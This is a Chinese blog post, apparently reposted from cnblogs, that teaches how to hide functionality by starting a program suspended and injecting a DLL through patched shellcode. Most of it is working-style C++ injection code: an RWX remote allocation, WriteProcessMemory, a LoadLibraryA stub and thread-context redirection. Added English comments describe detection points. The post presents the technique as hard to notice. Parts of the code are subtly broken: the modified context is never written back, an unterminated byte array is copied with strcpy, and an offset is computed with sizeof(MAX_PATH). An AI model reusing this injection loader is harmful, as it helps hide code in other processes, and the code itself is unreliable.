  • EXE1调用EXE2来加载DLL实现隐藏功能

    这种方法不易察觉,其实还能做出很多其他的类型,这里只是学习。

    Context.Eip = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
    改为
    Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
    线程在ring3的第一行代码时,Eax存放的是线程函数起始地址
    这个应该更稳妥:主线程暂停在ntdll空间,从ntdll到EXE入口点之间还会执行其他代码。
    学习于   http://bbs.pediy.com/showthread.php?t=159536
    自己修改了下结构。


    主CPP   ExeOfShellcodeDllInject  代码:

    #include "stdafx.h"
    #include <Windows.h>
    
    /* Record written into the child process by a single WriteProcessMemory call:
     * the DLL path string first, then the patched 19-byte stub (see ShellCode below).
     * NOTE(review): `typedef` with no typedef-name only declares the struct tag;
     * MSVC accepts this with warning C4091, and the rest of the file refers to it
     * as `struct tempData` / `tempData` (the latter is C++-only). */
    typedef struct tempData 
    {
    	char szInjectDllPath[MAX_PATH];  /* NUL-terminated DLL path, MAX_PATH bytes */
    	char szShllcode[MAX_PATH];       /* stub bytes, filled in by _tmain */
    };
    
    /* 19-byte x86 stub. The three 0x12345678 words are placeholders that _tmain
     * overwrites in place (at offsets 2, 7 and 15 of this array). The array has
     * no terminating zero byte, so it is not a C string. */
    char ShellCode[] = {0x60,0x68,0x78,0x56,0x34,0x12,0xB8,0x78,0x56,0x34,0x12,0xFF,0xD0,0x61,0xE9,0x78,0x56,0x34,0x12};
    //pushad
    //push 0x12345678      ; patched at +2: address of szInjectDllPath in the child
    //mov eax,0x12345678   ; patched at +7: address of LoadLibraryA
    //call eax
    //popad
    //jmp 0xXXXXXXXX       ; patched at +15: rel32 derived from the captured context.Eax
    
    /* Zero-initialised record that _tmain fills in and writes into the child. */
    struct tempData  g_data = {0x0};
    /*
     * Entry point of the injector sample from the post.
     * As the code below shows it: starts OrdinaryMsg.exe suspended, reads the
     * main thread's integer registers, allocates an RWX region in the child,
     * patches the stub placeholders, writes g_data into that region and resumes
     * the thread. Always returns 0, including on the error paths.
     * Defender note: CREATE_SUSPENDED followed by VirtualAllocEx with
     * PAGE_EXECUTE_READWRITE and WriteProcessMemory into another process is a
     * well-known injection sequence and a standard detection point for endpoint
     * telemetry; RWX allocations in a freshly created child are rarely legitimate.
     * Resource note: pi.hProcess and pi.hThread are never closed.
     */
    int _tmain(int argc, _TCHAR* argv[])
    {
    	// Fill the two members of the record: DLL path + stub bytes
    	 strcpy(g_data.szInjectDllPath,"shellcodeDLLInject.dll");
    	 strcpy(g_data.szShllcode,ShellCode);
    	
    	char szExePath[] = "OrdinaryMsg.exe";
    	//PathRemoveFileSpec(szExePath);
    	STARTUPINFO si = {sizeof(si)};
    	PROCESS_INFORMATION pi = {0};
    	CONTEXT context;
    	// Create the target suspended so its main thread has not yet run any user code
    	if (!CreateProcess(szExePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi))
    	{
    		printf("找不到exe
    ");
    		return 0;
    	}
    	// CONTEXT_INTEGER must be set for the integer registers to be returned
    	context.ContextFlags = CONTEXT_INTEGER;
    
    	GetThreadContext(pi.hThread,&context);  // return value not checked; context.Eax is used below
    
    	
    
    	// RWX region in the child sized for the whole record (+1 byte)
    	LPVOID lpData = VirtualAllocEx(pi.hProcess,NULL,sizeof(g_data)+1,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    	if (lpData == NULL)
    	{
    		printf("申请内存失败!
    ");
    		return 0;
    	}
    
    	// Patch the three placeholders of the stub (see the disassembly next to ShellCode)
    	*(DWORD*)(g_data.szShllcode+0x2) = (DWORD)lpData;            // push: szInjectDllPath is the first member, so lpData points at it
    	*(DWORD*)(g_data.szShllcode + 0x7) = (DWORD)LoadLibraryA;    // mov eax: presumably relies on LoadLibraryA mapping at the same address in the child
    	*(DWORD*)(g_data.szShllcode + 15) = (DWORD)(context.Eax - (DWORD)((char*)lpData + sizeof(MAX_PATH)+ 14) -5 );
    	// The 14 here is the distance from the start of g_data.szShllcode to the last place that needs patching (the jmp)
    
    	
    	if (!WriteProcessMemory(pi.hProcess,lpData,&g_data,sizeof(g_data),NULL))
    	{
    		printf("写入内存失败!
    ");
    		return 0;
    	}
    	// Set Eax in the captured context to the address of the stub inside the child's copy of the record
    	context.Eax = (DWORD)(((tempData*)lpData)->szShllcode);
    	ResumeThread(pi.hThread);
    		
    	return 0;
    }


    将    OrdinaryMsg.exe    shellcodeDLLInject.dll   和主EXE放在同一目录下可以运行成功
     OrdinaryMsg.exe 代码:

    #include "stdafx.h"
    #include <Windows.h>
    
    #pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )  
    
    /* Plain target program: shows one modal message box and exits.
     * The linker pragma above selects the windows subsystem, so no console is
     * attached (the FreeConsole/AllocConsole calls from the post are not needed). */
    int main(int argc, _TCHAR* argv[])
    {
    	(void)argc;
    	(void)argv;
    	const int pressed = MessageBox(NULL,"OrdinaryMsg","OrdinaryMsg",MB_OK);
    	(void)pressed;
    	return 0;
    }
    shellcodeDLLInject.dll  代码:

    #include "stdafx.h"
    
    /* DLL entry point. On process attach it switches off per-thread notifications
     * and shows a message box; on process detach it shows a second one. Thread
     * attach/detach are ignored. Always reports success.
     * NOTE(review): showing UI from DllMain runs under the loader lock, which
     * Microsoft's DllMain guidance discourages; fine for a demo, not for real code. */
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
    	(void)lpReserved;
    	if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    	{
    		DisableThreadLibraryCalls(hModule);
    		MessageBox(NULL,TEXT("DLL中非法操作"),TEXT("DLL中非法操作"),MB_OK);
    	}
    	else if (ul_reason_for_call == DLL_PROCESS_DETACH)
    	{
    		MessageBox(NULL,TEXT("DLL中非法操作完毕"),TEXT("DLL中非法操作完毕"),MB_OK);
    	}
    	return TRUE;
    }

    最后效果为:













  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982399.html